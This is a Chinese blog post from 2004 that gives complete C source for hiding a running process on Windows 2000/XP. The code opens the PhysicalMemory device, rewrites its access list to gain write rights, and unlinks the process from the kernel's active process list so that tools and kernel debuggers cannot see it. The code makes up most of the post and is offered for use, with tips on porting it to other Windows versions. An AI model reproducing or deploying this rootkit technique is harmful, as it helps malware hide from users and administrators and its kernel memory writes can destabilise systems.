CSDN博客

img littlerain007

Win2000/XP下隐藏进程

发表于2004/10/22 10:53:00  2414人阅读

  在讲解之前,首先提一提一些结构,进程执行体块中有数个进程相关链,其中之一是活动进程链。此链的重要作用之一就是在查询系统信息时供遍历当前活动进程,很有意思的是M$可能因效率因素使它被排除出进程核心块,意味进线程切换等操作时并不利用它,进一步说改写它也不该有不可忽视的问题(此即本方案的基础)。
  怎么做很明显了,在活动进程双向链中删除想要得隐藏的进程既可,核心调试器(如softice/proc)亦查不出来。
  2000下的隐藏当前进程的代码如下:
#include<windows.h>
 #include<Accctrl.h>
#include<Aclapi.h>
#define NT_SUCCESS(Status)      ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH    ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
  NTSTATUS  Status;
  ULONG    Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
  USHORT    Length;
  USHORT    MaximumLength;
PWSTR    Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT       0x00000002L
#define OBJ_PERMANENT      0x00000010L
#define OBJ_EXCLUSIVE      0x00000020L
#define OBJ_CASE_INSENSITIVE  0x00000040L
#define OBJ_OPENIF       0x00000080L
#define OBJ_OPENLINK      0x00000100L
#define OBJ_KERNEL_HANDLE    0x00000200L
#define OBJ_VALID_ATTRIBUTES  0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
  ULONG    Length; 
  HANDLE    RootDirectory; 
  PUNICODE_STRING ObjectName; 
  ULONG    Attributes; 
  PVOID    SecurityDescriptor; 
  PVOID    SecurityQualityOfService; 
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;  
 
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( 
            OUT PHANDLE SectionHandle, 
            IN ACCESS_MASK DesiredAccess, 
            IN POBJECT_ATTRIBUTES ObjectAttributes 
            ); 
 
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(         
             IN OUT PUNICODE_STRING DestinationString, 
             IN PCWSTR SourceString 
             ); 
 
RTLINITUNICODESTRING    RtlInitUnicodeString; 
ZWOPENSECTION      ZwOpenSection; 
HMODULE  g_hNtDLL = NULL; 
PVOID   g_pMapPhysicalMemory = NULL; 
HANDLE   g_hMPM   = NULL; 
 
BOOL InitNTDLL() 

  g_hNtDLL = LoadLibrary( "ntdll.dll" ); 
  if ( !g_hNtDLL ) 
  { 
    return FALSE; 
  } 
 
  RtlInitUnicodeString = 
    (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString"); 
   
  ZwOpenSection = 
    (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); 
   
  return TRUE; 

 
VOID CloseNTDLL() 

  if(g_hNtDLL != NULL) 
  { 
    FreeLibrary(g_hNtDLL); 
  } 

 
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) 

   
  PACL pDacl=NULL; 
  PACL pNewDacl=NULL; 
  PSECURITY_DESCRIPTOR pSD=NULL; 
  DWORD dwRes; 
  EXPLICIT_ACCESS ea; 
   
  if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, 
    NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS) 
  { 
    goto CleanUp; 
  } 
   
  ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); 
  ea.grfAccessPermissions = SECTION_MAP_WRITE; 
  ea.grfAccessMode = GRANT_ACCESS; 
  ea.grfInheritance= NO_INHERITANCE; 
  ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; 
  ea.Trustee.TrusteeType = TRUSTEE_IS_USER; 
  ea.Trustee.ptstrName = "CURRENT_USER"; 
   
   
  if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS) 
  { 
    goto CleanUp; 
  } 
   
  if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS) 
  { 
    goto CleanUp; 
  } 
   
CleanUp: 
   
  if(pSD) 
    LocalFree(pSD); 
  if(pNewDacl) 
    LocalFree(pNewDacl); 

 
HANDLE OpenPhysicalMemory() 

  NTSTATUS    status; 
  UNICODE_STRING    physmemString; 
  OBJECT_ATTRIBUTES  attributes; 
   
  RtlInitUnicodeString( &physmemString, L"//Device//PhysicalMemory" ); 
   
  attributes.Length      = sizeof(OBJECT_ATTRIBUTES); 
  attributes.RootDirectory    = NULL; 
  attributes.ObjectName      = &physmemString; 
  attributes.Attributes      = 0; 
  attributes.SecurityDescriptor    = NULL; 
  attributes.SecurityQualityOfService  = NULL; 
   
  status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); 
   
  if(status == STATUS_ACCESS_DENIED){ 
    status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes); 
    SetPhyscialMemorySectionCanBeWrited(g_hMPM); 
    CloseHandle(g_hMPM); 
    status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); 
  } 
 
  if( !NT_SUCCESS( status )) 
  { 
    return NULL; 
  } 
   
  g_pMapPhysicalMemory = MapViewOfFile( 
    g_hMPM, 
    4, 
    0, 
    0x30000, 
    0x1000); 
  if( g_pMapPhysicalMemory == NULL ) 
  { 
    return NULL; 
  } 
   
  return g_hMPM; 

 
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr) 

  ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr; 
  PGDE=BaseAddress[VAddr>>22]; 
  if ((PGDE&1)!=0) 
  { 
    ULONG tmp=PGDE&0x00000080; 
    if (tmp!=0) 
    { 
      PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF); 
    } 
    else 
    { 
      PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); 
      PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; 
      if ((PTE&1)!=0) 
      { 
        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); 
        UnmapViewOfFile((PVOID)PGDE); 
      } 
      else return 0; 
    } 
  } 
  else return 0; 
 
  return (PVOID)PAddr; 

 
ULONG GetData(PVOID addr) 

  ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); 
  PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000); 
  if (tmp==0) 
    return 0; 
  ULONG ret=tmp[(phys & 0xFFF)>>2]; 
  UnmapViewOfFile(tmp); 
  return ret; 

 
BOOL SetData(PVOID addr,ULONG data) 

  ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); 
  PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); 
  if (tmp==0) 
    return FALSE; 
  tmp[(phys & 0xFFF)>>2]=data; 
  UnmapViewOfFile(tmp); 
  return TRUE; 

 
BOOL HideProcessAtAll() 

  if (InitNTDLL()) 
  { 
    if (OpenPhysicalMemory()==0) 
    { 
      return FALSE; 
    } 
    ULONG thread=GetData((PVOID)0xFFDFF124); 
    ULONG process=GetData(PVOID(thread+0x22c)); 
    ULONG fw=GetData(PVOID(process+0xa0)),bw=GetData(PVOID(process+0xa4)); 
    SetData(PVOID(fw+4),bw); 
    SetData(PVOID(bw),fw); 
    UnmapViewOfFile(g_pMapPhysicalMemory); 
    CloseHandle(g_hMPM); 
    CloseNTDLL(); 
  } 
  return TRUE; 
}
  调用HideProcessAtAll即隐藏当前进程,如若一运行就隐藏,会修改到进程活动链表头,运行一段时间后可能出现些小问题,怎么解决^_^
CN-注意默认物理地址0x30000为一页目录,在大多数情况时这样,但是是有例外的!怎么解决亦留作“...”吧,不多废话了。
     稍微改一下偏移可移植于NT/XP/2003。

阅读全文
0 0

相关文章推荐

img
取 消
img